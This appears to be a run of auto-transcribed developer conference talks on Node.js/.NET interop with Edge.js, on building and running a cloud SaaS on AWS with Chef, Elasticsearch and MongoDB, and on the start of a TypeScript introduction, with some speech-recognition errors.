RabbitMQ, ZeroMQ sitting in the middle and, you know, your application may just be, I don't really need to know the result yet. I just need to, you know, publish a message onto the queue and somebody else is going to pick that up and do some work with it. That's a great integration strategy. So here's a benchmark, an updated benchmark. So I've got the same data on here, but in the second column, here's me publishing a message to RabbitMQ. It's still a little bit slower than a pure JavaScript function, but it's faster than edge in this case. And so in this particular scenario, I'm just doing like a fire and forget. I'm not expecting the result back. I'm just saying, you know, go run this report and email the results or something like that. So in this case, you know, using messaging is a great solution instead of calling into.NET directly. I can have a.NET Windows service that's listening on that message queue that picks that up and does the work. So to wrap up, I was just going to share what we're doing at Linkit. We're going to a message-based architecture as well, and we're doing a lot of, we're finding that Node is a great fit for doing some isolated services, and, you know, it's great for the things that it does really well. APIs and message-based architecture and, you know, having concurrency, being able to spin up multiple services, being able to have these hosted on Linux machines, which are a lot cheaper to run. And all the guys on my team or, and most of the guys in the company, we've been on.NET for probably 10 years or more. I know I've been on.NET since 1.0. I guess that's around 2002 or something. And our experience so far in picking up Node has been it's a fabulous experience. One of the guys on my team says, about two weeks in, I felt completely immersed and productive and comfortable, and, you know, he says, I'd rather stay in Node. So it's a lot of fun. It's brought a lot of energy to our team and a lot of momentum in our development. So we've been able to crank out some really awesome things, especially now that we're doing a message-based architecture. We've got those great separation concerns where we can have, you know, this one Node service that's listening for some messages that does that one thing and we don't have to create these monolithic applications like we've created in the past. And I've heard several, you know, some similar anecdotes from other.NET developers that have gone from.NET to Node. And of course, all these young whippersnappers that are coming out of college and, you know, they're really looking for, you know, to stay in JavaScript and stuff as well. That's all the content that I have. I know we've got some time left over for some questions. But for that, thank you very much for sitting through my talk. All right. We've got some time for questions. Anyone? Yes, sir? Yes, sir? So calling a.NET console application from Node, it's certainly possible. Now, the... So there's a couple of ways you could do that. One is you could have some inline code inside Node.js, I think. I'm not a Node expert, but you could probably accomplish what you're asking, since it's going to be out of process anyway. There's probably a way in Node that you can execute a external application directly from Node. So you may not even have to use Edge. But I'm not 100% sure of that. But if you wanted to use Edge, you could do that a couple of ways. You could have some inline.NET code that basically uses the process environment to arbitrarily execute it, pass parameters, whatnot. Or you could have an external class library that's expecting that input does, you know, creates the parameters out of that dictionary of string object and then executes that console app. So maybe you prefer, like, to recommend the process.start? Right, right. Something like process.start would be my best guess. Yes, sir? Do you set up a new aftermate method for or is that kept alive? Okay, so my understanding, the question is, you know, is it set up a new app domain for each method call, right? Yeah, it's kept calling for node. My understanding is it creates one app domain. And for every method or every anonymous block of code that you have in your Node.js application or whatever the case is, whatever, however many libraries you're referencing, it's going to load those all up into the same app domain. So you've just got, you've still got the one single thread. And so your inline JavaScript code or JavaScript or a C-sharp code that's in an external file, it gets compiled one time and then executed, the compiled version gets executed every time you call that function. Anyone else? All right, well, I'll be around. You can, again, find me on the Twitter is at Reverend Geek. I've got a, I've got an article here, leverage SQL server with SJS. It walks through from start to finish, you know, pretty much some of the things that we talked about here. Makes it really easy to, you know, step by step how to get to SQL server. And the Thomas Janshuk out on his blog or out on GitHub has a ton of examples. I mean, just about anything you want to do with between Node and.NET is out there. So again, thanks. Enjoy the rest of the conference. Oh, and I do have some swag up here if anybody wants to take some free stuff. So I don't have to carry it back with me. I've got some mouse pads. I mean, not mouse pads. Those are terrible mouse pads. And some, those are cell phone wallets. You can like stick it on the back of your phone and put your room key, your credit cards or business cards or whatever. Yeah, it's a very, very tiny mouse pad. Thank you so much for the look. Thank you. Um, you you you
Are you a .NET developer who wishes to jump into Node.js, but can’t abandon the .NET infrastructure in your organization? Are you a Node.js developer who needs access to libraries in the .NET world? Edge.js makes it possible to run Node.js and .NET code in one process, allowing interop between the two. In this talk we’ll explore ways to leverage the best of both worlds.
10.5446/50541 (DOI)
I'll get started then. I'm Ealing. I used to be a consultant and developer. I'm still a developer, but after I decided to do a startup, I'm also a DevOps architect, front-end developer, salesperson dealing with legal stuff and accounting. So if this presentation is a bit all over the place, it's because that's my daily life. We decided to build a software as a service for businesses or consultancies. And we started out, obviously, very simple. We're just a small application, and I want to talk about how that evolved to be kind of a quite big application. Just to show you, give you an impression of how this evolved graphically. This is the first ugly prototype, which turned into this. This is the first time I got the designer to kind of help me out, or I sent this to him, make it look nice. Next iteration looked a bit like this. And then I got my co-founder, which is an interaction designer, who also has to do lots of front-end and graphic design to help me out. So it started to shine a bit more. That's just how it looks. But it kind of illustrates the development also on the technology side, although I wouldn't swear on my grandmother that the tech is as pretty, but we try. Last place I worked before I started this was at Forward in London, and we were doing lots of Rails applications, Ruby on Rails. So that was my programming language and framework of choice when I wanted to create something fast. And I felt confident in that and productive, so I kind of just stuck with that and decided to go for it. So my experience from that has been, and it still keeps me quite productive. It's been a few issues. Obviously, there's been a lot of security patches the last few years to Ruby and Rails, but they kind of got around that. And as long as you keep up to date, just monitor it, it's very easy to apply them. It usually goes fast. They kind of take it to another level now, I feel, although you have to pay attention. Another thing is, and that might not just be a Rails thing, but in terms of gems or libraries, it's very easy to see that when you have a problem. You search for a solution. So we're using MongoDB, and I'll talk a bit more about that later. But I started using MongoDB, and then I wanted to have some kind of history, so you can track history when it changes to the models. So I just googled that, found a plugin or library for that, and then we needed pictures or images that we wanted to store, so there's a library for that. Then we needed opening the ID so we could authenticate with Google, et cetera. And you wanted to store parts of those tokens in the database, so there was a library for that. And you go on and on. If you don't think about it and just pull in a lot of libraries, you can end up with quite a lot of small libraries. Someone just made ones, true out there, and when it comes around to upgrading to a new version of the main library, the other ones might not be updated. So I ran into that quite a few times. And when I started looking at it, it's actually just one of these libraries for, I don't know, 70 lines of code, and I spent the day to try to figure out how to upgrade it until I just looked at it, oh, okay, I'll just write it myself or fix it. So that's something to pay attention to. We ran this on Heroke. I don't know if you know about Heroke, but it's very simple to get started, just push, get push, and it's running. For some kind of technical subtleties, we decided to move it to Amazon Web Services to run our own server. We started out with one server, and now we have at least 12, probably more. We also run it in a secure zone, which is called VPC or Virtual Private Cloud, which basically gives you the ability to define subnets. So we have two load balancers in the DMC. We have a VPN server that you have to connect to if I want to deploy to the servers. And a NAT server that kind of takes care of the outgoing traffic for, or I guess, call in about, but if some of these servers need to download something from the internet, they have to go through this. They are not exposed to the net at all. And we have one zone with the app server, and then the databases, search engines, et cetera. I'll get into details about this later. They run in a third zone. So Amazon Web Services, I was a bit familiar with that before I started out, but it's been working quite well. The Virtual Private Cloud stuff takes a while to understand and set up. But once you have it set up, it's very, I don't know, reassuring to know that the data is fairly safe. And it's only you that can access these things. There's a few tricks I learned. For example, the default settings for the load balancer. So the load balancer stays in traffic to servers. And you attach a server to a load balancer. And the load balancer pings the service on some URL to make sure it's online. And if it's not online, it will take it out of the load balancer and hopefully switch to another. But when you're starting out small, you might have just one server. And if something goes wrong on that server, the load balancer will take it out. And then you fix it, and you want it to go as quickly as possible back up again. But the default settings for these health checks is that it's something like 30 seconds times 10. So you fix it, and then you have to wait five minutes, 10 minutes, whatever, for the load balancer to actually recognize that it's working again. So I just lower that to the lowest possible thing now. And if you ever have 10 servers, maybe I can erase it again so that we have a bit more high threshold. Feel free to ask questions as we go along, by the way. I would lower it if we got interaction here. There's no big conclusion at the end. I'll just go through our stack. So feel free to stop me. Another very important thing is that security-wise. And security has been kind of a main driver for a lot of this. So you start out and just prototype something, and you build something, deploy it on a rookie, and you think everything is fine. But then you start selling this stuff to big clients, and they have a lot of security requirements for you. So you have to document your security. And you have to be sure that everything is secure. So that's one of the reason we went for this virtual private cloud thing, which makes it really hard to access the servers. But then Amazon Web Services has a web interface, and it might have code on GitHub that has a web interface, et cetera. So we have turned on two-factor authentication on everything. So if I need to log in, I always have to use the codes for my mobile. So just think about the weakest link all the time. So security has been one driver, and then privacy has been another one. So when I first started this, I didn't think I would have to answer questions about privacy, like, where is your data stored? How do you keep it from others, et cetera, et cetera. Fortunately, we were able to get away with this as long as we run on Amazon servers in the EU. So basically, our servers are in Ireland, and that's more or less works within the Norwegian law and requirements. So, but it's important to understand these things and actually take it seriously. And that are, you know, kind of non-functional requirements that I can drive your architecture and design and sort of limit your options a bit. So, but obviously having, you know, 12 servers, whatever, in the cloud, and we're basically two people in the company. We do a lot of different things every day. And it's not every day I set up a new server. So I do it, and I leave it running. And I might set up another one, a different type later, but it's very hard to remember how you do these things. So one day I woke up and the search server that we had, the instance, it was just like unreachable. It's not really there anymore. So that can happen when you run servers in the cloud. They get stuck, something happens. It's very easy to fire up a new one, but you need to configure it, and you need to deploy to it, right? So how do you do that, and how do you remember how to do that, and how do you make sure you can do that fast when the roof is falling down in the sense? So we decided to use Chef, which is how you heard about Chef. It's kind of like puppet infrastructure automation framework. Also written in Ruby, so that's probably why I chose it. But it allows you to define, basically programmatically, how your servers will be set up. So on the web server, I install Git engine X, which is kind of routing traffic to the app. Unicorn is just wrapping the app in a container. And different custom stuff that I have for running background workers, et cetera. So you specify this in code, and you run a command on the server that basically goes through all this code and just makes sure everything is installed, all the folders are created, the users have the right permissions, et cetera, and everything is just there. So if I need another server that is identical or I need to just make another server, just run that. That has given me a lot of confidence and helped me get some sleep. So that has been very nice, essentially. Some things take a bit longer to install, though. So for example, Ruby, they have a lot of new versions, and the Ubuntu repositories, whatever they don't always keep up to date with the new versions. So if you want the latest, you have to compile it from scratch yourself, and that could take 20 minutes, depending on the server. So I found out that it's most of the things I want to install using Chef, but the things that take a really long time, I do it once, I create a snapshot of that image, and I use that as a base image for all the other servers. So whenever I have to change that, I have to create a new base image, but it's not that often. And the good thing is that, you know, how to install all these application servers or services, whatever, there are what they call cookbooks. There are already recipes online. People have done this before. So if you're lucky, you can just Google how to, like, Chef NGINX, and you'll find the cookbook, and it just works out of the box, and you can customize some attributes most of the times. But like all other open source kind of ecosystems, sometimes these are just things that people made in a hurry and just put it out there. So I wanted to do, like, set up MongoDB in a replica set with some properties, and I found one that can do a replica set, and I found another cookbook that could set the property, but not one that could do both. So I had to write my own or take parts from here and there. So that's something to look out for. And Chef is nice, but it's very far from perfect. There's a talk about Docker later on, which I'm hoping is the new Silver Bullet. So we'll see about that, but it's helped us get quite far, but it's quite a bit of a learning curve, and it's a lot of effort. So that was a bit about the infrastructure. Client-side-wise, we have, well, it's almost a single-page web app, but it's more like a three-page web app. Anyways, we've been using lots of JavaScript or CoffeeScript. I really enjoy CoffeeScript. It's probably because it's quite similar to Ruby. I haven't had any issues with it at all. It's easy to debug. You see, even though it's not always the same line number because it expands, it's when it takes a CoffeeScript function and turns it into a JavaScript function, it automatically gets a bit bloated because you have to have the curly brackets and some other stuff. But it's very easy to debug still, which is what I hear people are a bit afraid of, but that's never been an issue for me. What can be tricky sometimes is that, I don't know if I can find an example of that. Some, the way the syntax works, I can show you. JavaScript has this setTimeout function, where the function is the first argument and the milliseconds are the last argument. However, CoffeeScript is very nice when you can do things like this. You pass in an argument, and then the second argument or the third, whatever, as long as it's the last one, if that's a function, you can just use an arrow and just indent the contents afterwards. But given the native setTimeout function on JavaScript, it's the other way around. One trick is to wrap it in another function that switches the argument, and then you can use the CoffeeScript syntax, but that's more or less the only challenge I have with it. We also have been using Backbone.js. I guess that was very much hyped at the time we started. It's been working out well enough. If you compare it to other client-side frameworks, it doesn't do that much. You have to bind it to all the bindings to the forms, et cetera. You have to do it manually. You have to do it yourself. The good thing about it is it's not that intrusive, and it's fairly flexible, but you do end up writing a lot of boilerplate code. I'm not sure I want to replace it with something like Angular yet, but I might get there one day. I had the same issue here as with just Ruby or Rails, is that at least when you start out with something, you don't know it that well, and you have a problem, you want to solve it, and you Google for the solution and you find the library. That does that for you. For example, I had a nested model. So you know something like you would have a model with a name, attributes, and then you might have children, and then an array with things inside here. I can figure out how to split that or how to do that with Backbone easily. You have collections and models in Backbone, so you would have a collection of the top model, and then each of these models would have a children collection, which again would have their own models. To begin with, I can figure out how to do this, but someone had made a library called Backbone Relational, which is, I think, 2,000 lines of code, which is probably twice the size of Backbone itself. So I pulled that in until one day I figured out how to do it, and it was very simple. So I could then delete 2,000 lines of code by adding and run 30 or something. It just saved a lot of code, so I could just delete all this by just using a simple parse method. I don't know if you can see it here. Just doing this basically. And split that out into the separate models myself. So it was not a lesson learned. The nature of our application is that it's essentially a CV database which stores all your skills and projects and everything you've done. And sometimes salespeople, for example, they want to search and find skills, and we also want to give people, like, auto-completion, auto-suggestions, et cetera. So we needed a search engine. And the obvious choice was Elasticsearch. It's very scalable. It's got a JSON API. And it was really, really easy to get started with. So I just, we already had the data in JSON, so I just drew it in there and searched and things came back. And it seemed to work. Very nice. Until you start fiddling or running into edge cases. So, for example, an example would be search for C sharp or.net or something like that. By default, like a good search engine, Elasticsearch will strip out stop words and punctuations and all this. So you have to specify an analyzer that does not do that. So you want, so we ended up with for the big text fields. Let's see if I can find that. This is a regular expression pattern that it will split on commas and whitespace, I think. And also on periods, but not if they are on the beginning of a word because of.net. And it took me, this was not standard, so, but they have this, it's very flexible so you can specify this, but it took me a while to understand like how to create this and how to specify that. And the same goes for, let me see if I can show you an example use case. So you would fill in some, like, a customer and you need suggestions and you get some more suggestions. And all these comes from the API and we also have tags here. The problem is when I search for start typing Java in lower case or if I start typing it up or case, I wanted to hit the same thing, I really mean the same thing, I wanted to be case insensitive. So what Elastic Search does or usually does by default is to have just lower case everything, so it stores everything lower case and then all the search phrases that comes in, they go through the same kind of filter that also lower cases your search terms, you are always matching lower case against lower case, which is very nice. Until you want to use something like facets, which typically gives you the top ten skills, which are what we use for these kind of recommendations or suggestions. The problem is then if you get the top ten and they are all lower case, you cannot use them. So we figured out you could actually use a multi-field mapping, which looks something like this. So you have a description, which is stored twice. So one time it is using one analyzer and then you store it untouched, so basically not analyzed at all. And that means you have to specify when you search, okay, when I search, I want to search in this field, but when I want the facets, you use the untouched one, et cetera, et cetera. And it takes a while to get all these things right, and there are still some edge cases which we are working out. So you end up with quite a huge mapping, obviously you can generate this with code most of it, and there are some good frameworks wrapping it, but it takes a while to get everything right. But I still really like Elasticsearch. Another issue is similar to what I had client side, you have a nested document and you want to search in it. So there are two ways to store this in Elasticsearch or how to map this. You can say, okay, we store it as one document, and we say this document has lots of child documents. The problem is then when you search and you find a match, it returns the whole parent document, it never returns just the children. So to be able to do that, you have to store them in separate documents and then specify a parent child relationship, which is okay, but it takes a while to try out all these things and get it right. We also had to make sure the search engine is kind of live and responding and it turned out to kind of slow us down if you don't kind of ping it all the time. So we like every other thing, just set up something that just pings it. It's got a very good developer community though. They are actually based in Amsterdam, I think, the headquarters for the company that's sort of behind Elasticsearch. There's been several Elasticsearch meetups here in Oslo with all these people who actually build this thing. I think maybe Martin is even here at the conference. So that's been a really good thing for me. I met them, I talked to them, and they actually fixed some issues that I found really fast. So that's a good thing, I think. And I really look forward to how it will develop. So MongoDB, no SQL database. It kind of made sense that we have CVs. They are documents. Support them in JSON, throw them into MongoDB. Don't worry about schemas, nothing. It's been very nice a long time. I haven't had to worry about, you know, migrations or data types. I just pushed data in there. And it's probably one of the reasons that we are actually being able to develop this as quickly as we have. However, when you do have to do migrations, like move a field from somewhere, it does take, it's not straightforward. You can write some kind of custom Java scripting that you're running on MongoDB or you can write it in Ruby. You can read out the field from one document and write it within UQ in the other and then another script that kind of cleans it all up afterwards, which is something you get a bit more for free with the usual database migrations on the SQL database, I think. And I'm starting to feel the pain about not having joins. So you have lots of documents and it's nice when you just retrieve the whole document. And this one document is what you ask for. But when you need 200 documents and you need some information from this, some from this, and it just takes a bit longer than it should, I think. So I've been looking a lot into Postgres, which now has JSON support quite extensively actually in 9.4. So at the moment I'm kind of feeling, should say goodbye to MongoDB and go back. So I'm not sure yet, but I think that's where we're heading. MongoDB, it scales okay, but the way you configure this is quite tricky, I think. We have three MongoDB servers, which is called a replica set. You have to have three because they vote. So if you have two, they'll never agree. So you always have to have the third one. And if you go beyond that, you have to have five, seven, et cetera. The challenge is that when you want to have backups, you don't want to take backups from the main master. So what you can specify that one of these, they can never be elected master. They have a priority of zero and they are sort of hidden from the set, but they are part of the voting. So that's where you take the backups to. And there are three, four, five different ways of backing up MongoDB, but just as not recommended, not recommended, not recommended. The only recommendation is to snapshot the entire disk and just store that. And that's what we do. And it's easy with Amazon, but feels a bit so weird because if you don't have to recreate something from the backup, you have to start a new server, attach that backup image and sort of go from there. Although Amazon does have quite good support for snapping, taking snapshots of your disk. The other hard part was to actually generate documents. So when we started out, we thought we could get away with just doing PDFs. And there are some frameworks that allows you to generate PDFs from HTML. They're out there. They work like this. But that's where it started until people started demanding doc and docx, et cetera. So we had to figure out, okay, how do we generate documents? I'm not coming from kind of the Microsoft world, so this was a bit new to me. What we ended up with was using Word templates. It looks a bit like this. We found a framework for a third-party application that can take, these are almost like the, call it built-in merge fields, but they're only just plain text, but these will be replaced by this framework with merge fields. And then they run that through OpenOffice. And out comes a document. So you post some JSON to it, and it turns this into a Word document, which it works, and it's quite flexible. But there are lots of edge cases. So, for example, images are transparent. They won't be transparent when they come out in the other end. You can't float everything like you want to. There's sometimes the differences between docx and PDF. There are lots of, some of these are due to bugs or missing features in OpenOffice. So it works. And we always figure out how to do this. But it's kind of steep learning curve, and we want our customers to be able to do this really fast and easy. So what we're looking at now is, okay, can we do this another way? So what we want to is to have like a drag and drop interface and just generate the documents from there. So we looked into something called a Partshe P O I, which is, I think it's really good for Excel documents. They kind of, you call it backwards engineer, this thing. But, and then read this sentence, which is, we do not have someone taking care of this. We need someone to take this thing under his hood as his baby, blah, blah, blah. So this part, which I wanted to use, which generate documents, is now an orphan child waiting to be adopted. So that was a no go. What we're looking into now is a framework called a Spose, which, based from our trials, is really good at abstracting all these different formats. So you can specify something with this library and it will come out exactly the same in PDF, Word, whatever. I think they have the net version as well, but we are using the Java one. And just because we can, we are wrapping it with closure. So this is early stage prototyping, so I can tell you more about how that worked out later. What I learned before I started this and after I've done this is that monitoring is very, very important. So you need to make sure that your servers are up and running all the time and you need to monitor them a lot. So we use, on a very low level, if, I don't know if you know the Unix world at all, but use something called monitor, which just checks disk space, memory usage, etc., try and knows how to restart services when something goes wrong and they also notify you via email. So we've been using that a lot. That is very easy to set up with Chef. So let's see if I can find an example that I think is a workers. So with Chef, it's as simple as just saying, okay, for this worker, I want to create a monitor file and it looks something like this. So check the process with this process ID and start it like this. And you stop it like this and you can have lots of these different checks, which checks all kinds of things for you. So that makes sure it's up and running. Chef also has a daemon that you can specify. So that will basically run, well, when our service, it runs almost every five minutes and it just makes sure that everything is up to date and everything is installed as you told it to. So I once tried to stop, I wanted to do something, a manual change on the server and I tried to stop NGNX and just kept coming up again. And it's because of Monit. So I stopped Monit and now it still comes up again. That's because Chef restarted Monit and Monit restarted Chef. So it's almost impossible to stop anything on the servers now, but I guess that's a good thing. New Relic is like an online tool that is very useful for figuring out where in your code things are slow. So it tells you something like which controller is being used most, which is the slowest one. Is it the database query that is slow or is it this model or this service, whatever, that is slowing you down and that actually works both client side and server side. So that's, and they also ping your servers from around the world and tells you if something goes down. Same thing with Pingdom, they just ping it, we have a status page that just says, am I connected to a database, am I connected this, blah, blah, blah, if not, return something else than 200. And Pingdom will not find me. I learned the lesson the hard way, so when you do this, more or less on your own. And something goes wrong, it sends out an email. But you know how you connect your mobile to Wi-Fi and sometimes you're connected to Wi-Fi, but you're not connected to the internet. So I was at home one day and I just walked out the door in the morning and it's like, whoa, it's got tons of emails saying everything was down and it's like, why didn't it tell me this before? And because I wasn't connected to the internet, so now I have SMS notifications in addition to that. So just a lesson learned. I mean, I use something called air break, which is basically hooks into every exception or uncaught exception both client side and server side. And just, it sends it to the service and you get an email saying, okay, this thing went wrong on this URL, this is the stack trace, these are all the request parameters, et cetera, et cetera. So it's very useful. So instead of having to monitor your log files and look for errors, it just tells you immediately where it is. And then you can fix it fast. So I think a few other tools have used is intercom, which is, let's see, it's basically just a chat here. So any user just says, help me. And you get notified on an app or by email. And if you answer fast enough, they'll get the response back in the app. If not, we send them an email and that happens automatically. And that's increased a lot of feedback from our users. So it's a very, feel like you're quite close to the user, which is good. We also been using something called mix panel for analytics, but it's not been giving us that much value for now. So what has gone wrong? So we have all these pictures, these pictures. And they are stored on Amazon. But we can't just store them open because it's kind of private to the customers. But we don't want, but it's still nice to leverage Amazon's infrastructure in terms of hosting. So the way it works is that when I asked my model for the URL to that image, it gives me a URL with a key that lasts for like an hour. So if you have this parameter, you can download that image and you can cache it for an hour. However, every time I did a new search, it would just generate a new URL, which can last for like, well, a second later, it will last for a second later. So I wanted to cache this and I started caching these URLs in something called Redis key value store, very high performance. And that worked fine until one day, someone like the app is really slow and it's searching and it takes forever, but it works. It wasn't getting any real errors. It was very slow. And I thought I set the timeout to one second, which I think that was, that's quite low. Okay, if it times out after a second, it should just still work. But for some reason it was taking longer. And that's obviously because the timeout was one second per image. So it's kind of queuing up all this. So I ended up setting the timeout to like 0.0, whatever one second. So it times out immediately if we can't fetch it. So even if that's 100 images, it's still probably just totals to a second and it still works. So we have source code on GitHub for, which I think is really nice, but there have been people at least tried to hack them quite a lot lately. So there's been some distributed Nilo service attacks on them. And that actually means that GitHub might be unavailable for an hour, which is okay, but if you're about to deploy or just in the middle of a deployment and you're trying to fetch code, the new code from GitHub and put it on your server, then that is a problem. So I'm not quite sure how to solve that. You could always mirror it somewhere else. Maybe that's the solution, but I'm not sure. So I mentioned these servers on Amazon. It hasn't happened in a while, but it did happen that they became unavailable. You might get an email saying, we're going to retire this server. You need to get off it within a week. And then it might just happen the day after. So that happened to us once as well, because there is always a reason they are retiring them. So I think they find out something is wrong with them and they tried to keep them running. But what I learned is that as soon as you get an email saying, we'll retire this in a month, just do it immediately because it's probably a reason they are retiring them. We also do a single sign on integration. So we support Google Apps and Active Directory, Federated Services integration. So you log in, you're redirected to one hour customers, ADFS server that is exposed to the Internet. They log in there and they sign a request, send back to us with a valid email address, et cetera, which we then validate. And that worked. That wasn't too hard to set up. And it's been working fine until one day I had replaced the server with a new one, but it was exactly the same because I used Jeff's exactly the same stack. It was not a new version of the code. So it's like, what went wrong? Why isn't this working? It worked yesterday. It's the exact same thing. So it turned out the clock on the new server was a bit off when compared to our customers' server. So you need to take that into account. So there are some tools that allows you to synchronize clocks with some official place that helped. And you can also increase the kind of allowed drift a bit. But that was a tricky one. So going forward, we're trying to make the app more interactive. So two people work on the same document. We want them to be able to do that seamlessly without overwriting the other one's changes or just getting like a conflict and say, no, you can't send this. So we've been trying this service called Pusher, which is essentially WebSockets. So if someone does a change on this one, it goes to the server. The server tells Pusher. Pusher sends it through WebSockets to the client or the other user, and he can fetch the latest data. But that is tricky to get correct because when you open and close your laptops and you reconnect, you move around. Everything can happen. And it's hard to know the state on the client side. So that's our experience from that so far. We've been using it a little bit, but not extensively yet. So I guess I think that was going through our stack and kind of how that has evolved and what has worked and what hasn't worked that much. Any questions or comments? Cool. Chair. Thanks. That's interesting. What does it do? It does an operational transform on edits. Nice. It handles all the complexity with syncing data between different clients. So it's basically Google Docs for JSON. Nice. We're looking for that actually. Any other comments, questions? Anything you want me to dive deeper into? I really appreciate if you use the comments box downstairs, just the red, yellow, green ones. And if you have any suggestions or feedback, please come to me and tell me. I appreciate the honest feedback. So, yes. We can say that a non-cloud solution is that most of the people who don't have much traffic to Google Chief or maybe you know, you need this app to be scalable. That's a good question if we needed to be scalable and if we could run a non-cloud solution. So I think obviously we have big ambitions. We want to have lots and lots of customers on this. So we're building it to scale but maybe we're doing it prematurely. That could be. The other thing I think is the flexibility which I like. So if I want to play with, let's say I wanted to use Postgres instead of MongoDB or I wanted to try a new library somewhere, it's just, you know, quick command and I have a new server. I can play with it and I can nuke it again if I don't want it. I kind of like that. And I can scale them up and down. So most of these servers are, you know, small instances or micro instances for now. So they don't cost that much. But they give us, I mean, it's just a click or a button and you have a new server which is, I haven't found the equivalent in terms of, you know, having an in-nows server which you have to. But I see your point. Obviously if we run, maybe we could run all this in one box and it would still have worked. And maybe it's a bit over-engineered for now. I think I can agree with that. But we are trying to build something that can scale and it will have to scale very soon. But it's obviously hard to know which part you need to scale up front. No. But, you know, doing a startup, if you start counting hours, I think you get crazy anyway, because, but no, I agree. It could be worth doing that calculation to figure out if it's actually worth it. But it does give me the confidence that I can scale almost overnight if we need to, which is nice. And we can say that to customers. Yes? So, obviously, being, coming from a developer background, sales marketing is not my strength, really. But we, I think marketing, we're still pretty bad at it. But the sales part, we're getting better at. But we do everything from, you know, just meeting people here, because our clients are consultancies. So I can do talks here. And I kind of reach my target market that way. And just being part of the community, which I enjoy from before. So it's like, for me, as a win-win, I can meet people. I enjoy talking technical stuff, about technical stuff and process stuff, et cetera, with them. And they are potential clients as well, which is good. But, yeah, I think just for us, it's just word of mouth, just being out there, that works. And then that gives you a lead somewhere. And then it's your responsibility to take it from there. But business to business, and being few people, being something new, it's, that's what I tried to talk about earlier, like the security requirements, the privacy requirements, the backup solutions, all that. You have to make sure you reduce the risk for your clients. So we dump all the CVs in Word documents to your preferred storage solution every night, just so you have it. So you can trust that if we disappear or go down, which we don't do, but still, you're safe and you have all your data. But in terms of sales, yeah, it's just talking to people, reaching out, being visible, and sometimes cold call. But it's quite long sales cycles, at least for the large clients. There's lots of legal stuff and just getting things to happen. It takes a while. I don't know if I answered anything, but yes. Yes. Yes. Yes. Yes. Yes. Yes. Yes. Yes. Yes. Yes. Yes. I have a question about the home alexir so what about your Yes. That sounds like a good solution I think. I was just a simple example. We have some bit more complicated ones. And Jeff is running, but it's mostly just installing. On the third, fourth run, it doesn't do anything really. But obviously if something has changed, it will probably check that most of the services are running. But it's not really its job, it just happens to do that. But I agree, separating responsibilities there would be nice. And as I said, Jeff is probably, it could be how I use it, but I feel it's not perfect. All these DevOps things, they are quite immature or new. And I think people are trying to find the right kind of balance or separation there. So that's why I'm a bit curious about Docker, for example. Cool. Love to talk more about that. Anything else? Yes? But is that just not another, sorry, so Git-Torios instead of? Ah, okay. So I love all the features with Git-Torios, but probably it would be nice to keep a clone somewhere. And maybe Git-Torios would be a good option. Yes. Cool. Thanks. Yes? Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
We would like to share our experience with building and running a SaaS in the cloud. We will talk you through how our solution grew from running a single application on Heroku to consisting of 12 servers running in a secure cloud. Which technologies and frameworks have we used and what have our experience and challenges been. Which trade-offs did we have to make to account for security and privacy. We will also share som war stories from when things have gone wrong in the past.
10.5446/50543 (DOI)
This is what I'm going to talk about. Once you go the TypeScript path, you don't have to understand those things. Hopefully you will understand those things, but you will use a language that compiles into JavaScript and that gives you type safety. And it gives you a lot of other good stuff, and I'm going to present the TypeScript language in the next one hour. If you don't know me, I'm Gil Fink. I'm a senior consulting working for my own consulting company called SparkSys. I'm an SV.NET MVP for the last five years. I also wrote a book called Pro, Single Page Application Development. You can buy it in Amazon. And I wrote four different mocks. Mock is a Microsoft official curse. I wrote the courses about HTML5 programming and about Windows 8 using HTML5 and JavaScript. Not good for me because Microsoft doesn't give me the credit that I wrote those courses and the books that follow the courses, but, you know, can't have all the things in my life. What I'm going to do is, as I said, introduce the TypeScript language. And then after I'm introducing a few features in TypeScript, we're going to write an end-to-end application. So if you heard about Node.js, I'm going to use Node.js in the server side and I'm going to use JavaScript on the client side to build my web application. But before I'm building that application, let's talk about writing end-to-end JavaScript. Oh, my God. Who had the opportunity to do such a thing except for me? Okay. Not a lot of hands in the crowd, but people, you can do that today with frameworks like Node.js and other frameworks. You can write server side code in JavaScript and you can write client side code in JavaScript and you will have a full stack development in JavaScript. And then there are two quotes here that are talking about one of the problems. The first problem or the first quote is a reference to Eric Mayer. Eric said something like JavaScript is the assembly language of the web. Who wants to write in assembly? If you learned assembly, okay, so you must understand that it's hard. The second thing that is a second quote here is you can write large programs in JavaScript, you just can maintain them. This is a horrible thing to say by Anders Asberg, but it's true. Trying to manage one million lines of code in JavaScript is horror. It's so hard to do. If you are not hard code JavaScript developers and you have a lot of junior developers in your company working in JavaScript, JavaScript is one of the languages that are learned in ignorance. People just use it as is and don't try to understand the pitfalls like those that I showed you at the beginning of the session. So what are the alternatives? The first alternative is my favorite. Write hard code JavaScript. I have the Stockholm syndrome. I must confess I love JavaScript. But there is another option. The other option is writing JavaScript with preprocessors. There are languages, sorry, there are frameworks that compile into JavaScript. One particular framework like that is CoffeeScript written by Jeremy Ashkenaz. It influences a lot of features in ECMAScript 6 which is the next version of JavaScript. And CoffeeScript forces you to learn a new language in order to create your JavaScript, in order to compile to JavaScript. Other languages like Dart or ClosureScript or ScriptShop are the same. You have to learn a language and that language will compile into JavaScript. What if we had a language that compiles into JavaScript but you write it in JavaScript? And this is where TypeScript is coming. TypeScript is just a superset of JavaScript. What I mean is if you know JavaScript, you are 80% on your way. Every JavaScript file that you transfer into TS file, the postfix of JavaScript, will automatically be a TypeScript file. You don't have to do anything. A little bit you don't have to do anything because if you have problems in your code, you will get notified by the TypeScript compiler that you have problems in your code. Problems in typing, problems in things that you are using which are obsolete, etc. So with that, let's jump into a first demo. And before we are jumping into the demo, I want to show you something. So you want to start with TypeScript. The first place that you are going to go is typescriptlang.org. This website includes first the ways to download TypeScript. If you are using Visual Studio 2013 or 2012, it's part of the Visual Studio. If you are using WebStorm like I do, WebStorm is an IDE from JetBrains, then it's part of the IDE from version 6. And it has plugins for sublime and other IDEs that you can use. But if you want to download it right now, then you go to the website and in the website, you just need to click on the Get TypeScript now. Once you do that, then you can download it and then use it. The other option is using NPM if you are from the node environment, then use NPM and download TypeScript. Once you download the TypeScript, then let's go to WebStorm. You can start working with it. So let's write the thing that I wrote earlier in my demo. Let's use 9 instead of 8 and let's put the string 9 and let's do something like console.log and num1 minus num2. Okay. I'm saving the file. And you can see here that I have something, an error jumping inside of the ID itself. And that error here is telling me that the right hand side of the automatic operation must be type any number or enum type. That means that I have a problem here. I can do other stuff like, for example, I'm going to do something like that. I'm using colon to say this is a number and I'm getting the error printed to me. Num2 must be a number and I'm using a string instead. So this is how you infer types. In TypeScript, you just put colon 